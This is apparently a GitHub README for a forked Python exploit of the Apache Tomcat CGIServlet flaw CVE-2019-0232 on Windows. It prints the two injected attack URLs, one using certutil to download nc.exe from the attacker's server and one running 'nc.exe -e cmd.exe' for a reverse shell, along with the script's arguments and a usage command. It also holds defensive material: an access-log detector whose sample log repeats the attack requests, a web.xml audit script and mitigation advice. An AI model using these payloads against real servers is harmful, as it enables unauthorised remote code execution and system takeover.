This project was forked from https://github.com/jaiguptanick/CVE-2019-0232.
This repository contains an enhanced Python script for exploiting the Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution (RCE) vulnerability, known as CVE-2019-0232. This vulnerability allows for remote code execution on Windows systems under certain configurations.
Apache Tomcat's CGI Servlet can be exploited to achieve RCE on Windows when it runs with `enableCmdLineArguments` enabled. This only applies in a non-default configuration in which the CGI Servlet is enabled and used to run batch (`.bat`) files. The CGI Servlet is disabled by default, and from Tomcat 9.0.x onwards `enableCmdLineArguments` is also disabled by default in response to this vulnerability.

Affected versions:
- Apache Tomcat 9.0.0.M1 to 9.0.17
- Apache Tomcat 8.5.0 to 8.5.39
- Apache Tomcat 7.0.0 to 7.0.93
The exploit script performs two primary actions to leverage CVE-2019-0232 in Apache Tomcat:

- Downloading Netcat using certutil:

  ```python
  url_download_nc = f"http://{args.target}:{args.targetPort}/cgi/{args.script}.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F{args.attackIp}:{args.webServerPort}%2Fnc%2Eexe+nc.exe"
  ```

  - Action: This URL uses the vulnerable CGI script to execute the Windows `certutil` utility, abusing its ability to fetch files from the web.
  - Abuse of certutil: `certutil` is used to download `nc.exe` (Netcat) from the attacker's server, relying on its `-urlcache -split -f` options to fetch and save a file from a URL.

- Establishing a reverse shell with Netcat:

  ```python
  url_reverse_shell = f"http://{args.target}:{args.targetPort}/cgi/{args.script}.bat?&nc.exe+{args.attackIp}+{args.ncListenerPort}+-e+cmd.exe"
  ```

  - Action: Once `nc.exe` is on the target system, a second crafted URL invokes it through the CGI script, instructing it to connect back to the attacker's machine and open a reverse shell.
  - Mechanism: `nc.exe` uses the `-e cmd.exe` option to bind the command shell (`cmd.exe`) to the network connection, granting shell access to the attacker.

Both steps abuse the CGI Servlet's mishandling of command-line arguments: the query string is turned into arguments for the batch file, and `cmd.exe` interprets the injected `&`/`&&` separators as additional commands. The first request downloads the tool with `certutil`, the second executes it to gain unauthorized access.
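As a defender-side complement to the description above, the following is an added example (not code from this project or from the original fork) that scans Tomcat access-log lines in the default `%h %l %u %t "%r" %s %b` format for requests that hand shell-style arguments to a CGI script. It mirrors the CGI Servlet's rule that a query string containing no `=` is treated as a list of `+`-separated, URL-encoded command-line arguments, and flags any decoded argument that falls outside a conservative character allow-list. The sample log lines, the `/cgi/` prefix and the allow-list regex are constructed assumptions for the example.

```python
"""Flag Tomcat access-log requests that pass shell-style command-line arguments
to a CGI script (the request shape that CVE-2019-0232 abuse relies on).
Added example for this README; not code from the exploit project."""
import re
from urllib.parse import urlsplit, unquote

# Default Tomcat AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Conservative allow-list for one decoded CGI argument (assumption for this
# example): shell metacharacters (& | < > ;), drive letters and path separators
# all fall outside it and are flagged.
SAFE_ARG_RE = re.compile(r"^[A-Za-z0-9._-]+$")

# Path prefixes served by the CGI servlet; /cgi/* matches the README's URLs.
CGI_PREFIXES = ("/cgi/",)

# Constructed sample log: two exploit-style requests (same shape as the URLs
# in this README) followed by two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2019:10:15:32 +0000] "GET /cgi/cmd.bat?&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F10.0.0.9%2Fnc%2Eexe+nc.exe HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2019:10:15:40 +0000] "GET /cgi/cmd.bat?&nc.exe+10.0.0.9+4444+-e+cmd.exe HTTP/1.1" 200 0
10.0.0.7 - - [12/Mar/2019:10:16:01 +0000] "GET /cgi/report.bat?date=2019-03-12&format=csv HTTP/1.1" 200 2048
10.0.0.8 - - [12/Mar/2019:10:16:05 +0000] "GET /index.jsp HTTP/1.1" 200 1024
"""


def cgi_args_from_query(query):
    """Mirror the CGI servlet's argument rule (RFC 3875 section 4.4): a query
    string with no '=' is a '+'-separated list of URL-encoded command-line
    arguments; a query with '=' is form data and yields no arguments."""
    if not query or "=" in query:
        return []
    return [unquote(token) for token in query.split("+") if token]


def analyze_log(text, prefixes=CGI_PREFIXES):
    """Return one finding per request to a CGI path whose decoded arguments
    contain characters outside SAFE_ARG_RE."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected access-log format
        parts = urlsplit(match.group("target"))
        if not parts.path.startswith(prefixes):
            continue  # not handled by the CGI servlet
        bad_args = [a for a in cgi_args_from_query(parts.query)
                    if not SAFE_ARG_RE.match(a)]
        if bad_args:
            findings.append({
                "line": lineno,
                "client": match.group("client"),
                "path": parts.path,
                "status": int(match.group("status")),
                "bad_args": bad_args,
            })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

Running the block on the sample prints two findings (the `certutil` download and the `nc.exe` call-back), while the `report.bat?date=...` request passes because its query carries `=` and is therefore never turned into arguments. The same per-argument allow-list idea is what the fixed Tomcat releases enforce server-side through the CGI servlet's `cmdLineArgumentsDecoded` pattern (a parameter of the fixed releases, not mentioned on this page).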
The provided Python script automates the process of exploiting this vulnerability to gain a reverse shell on the vulnerable system. The script is configured through command-line arguments, allowing for flexible deployment.

Prerequisites:
- Python 3.x installed on your system.
- The `requests` library installed in Python. Install it via pip if necessary: `pip install requests`
- The target system must be running a vulnerable version of Apache Tomcat on Windows.
- The attacker must have a reachable web server to serve `nc.exe` and a Netcat listener to receive the reverse shell connection.
Arguments:
- `-t` or `--target`: Target IP address.
- `-p` or `--targetPort`: Target port (default: 8080).
- `-s` or `--script`: Script to use for the attack (default: cmd).
- `-a` or `--attackIp`: Attacker's IP address.
- `-w` or `--webServerPort`: Attacker's web server port (default: 80).
- `-n` or `--ncListenerPort`: Netcat listener port.

Usage:

```bash
python cve-2019-0232.py -t 192.168.1.100 -a 192.168.1.10 -n 4444
```
Mitigation:
- Disable CGI support in Tomcat (it is disabled by default).
- Ensure `enableCmdLineArguments` is set to `false` within the CGI Servlet initialization parameters.
- Apache has implemented a regex pattern to prevent input from executing commands on Windows systems.
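To check the second mitigation above on an actual deployment, the following is an added example (not code from this project or from Tomcat) that parses a `web.xml`, finds every servlet declared with Tomcat's CGI servlet class `org.apache.catalina.servlets.CGIServlet`, and reports whether `enableCmdLineArguments` is on, off, or unset, together with the URL pattern the servlet is mapped to. The two embedded `web.xml` fragments are constructed: one with the vulnerable setting and one with the mitigation applied.

```python
"""Audit a Tomcat web.xml for a CGIServlet declaration that accepts
command-line arguments, i.e. the non-default configuration that
CVE-2019-0232 depends on.
Added example for this README; not code from the exploit project or Tomcat."""
import xml.etree.ElementTree as ET

# Tomcat's CGI servlet implementation class.
CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed sample: CGI servlet enabled with enableCmdLineArguments on,
# mapped under /cgi/* as in this README's URLs.
VULNERABLE_WEB_XML = """\
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# The same file with the mitigation from this README applied.
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-value>true</param-value>", "<param-value>false</param-value>")


def _local(tag):
    """Strip the XML namespace so elements compare by local name."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child with the given local name, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def audit_web_xml(xml_text):
    """Return one finding per CGIServlet declaration.

    risk is "HIGH" when enableCmdLineArguments is "true", "OK" when it is
    "false", and "REVIEW" when the parameter is absent, because the default
    then depends on the Tomcat version (see the notes in this README).
    """
    root = ET.fromstring(xml_text)

    # servlet-name -> url-patterns, so a finding shows the exposed path
    mappings = {}
    for elem in root.iter():
        if _local(elem.tag) == "servlet-mapping":
            name = _child_text(elem, "servlet-name")
            mappings.setdefault(name, []).append(_child_text(elem, "url-pattern"))

    findings = []
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if _child_text(servlet, "servlet-class") != CGI_SERVLET_CLASS:
            continue
        params = {}
        for child in servlet:
            if _local(child.tag) == "init-param":
                params[_child_text(child, "param-name")] = _child_text(child, "param-value")
        value = params.get("enableCmdLineArguments")
        if value is None:
            risk = "REVIEW"
        elif value.lower() == "true":
            risk = "HIGH"
        else:
            risk = "OK"
        name = _child_text(servlet, "servlet-name")
        findings.append({
            "servlet": name,
            "url_patterns": mappings.get(name, []),
            "enableCmdLineArguments": value,
            "risk": risk,
        })
    return findings


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        for finding in audit_web_xml(text):
            print(label, finding)
```

Point `audit_web_xml` at the contents of `conf/web.xml` and each application's `WEB-INF/web.xml`; a "HIGH" finding with a URL pattern is exactly the exposure this README describes, and an absent parameter should be resolved by setting it to `false` explicitly rather than relying on the version-specific default.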
References:
- Original CVE details: CVE-2019-0232
- Various analysis and mitigation recommendations:
This script is provided for educational purposes only. Use it responsibly and always with permission on systems you are authorized to test.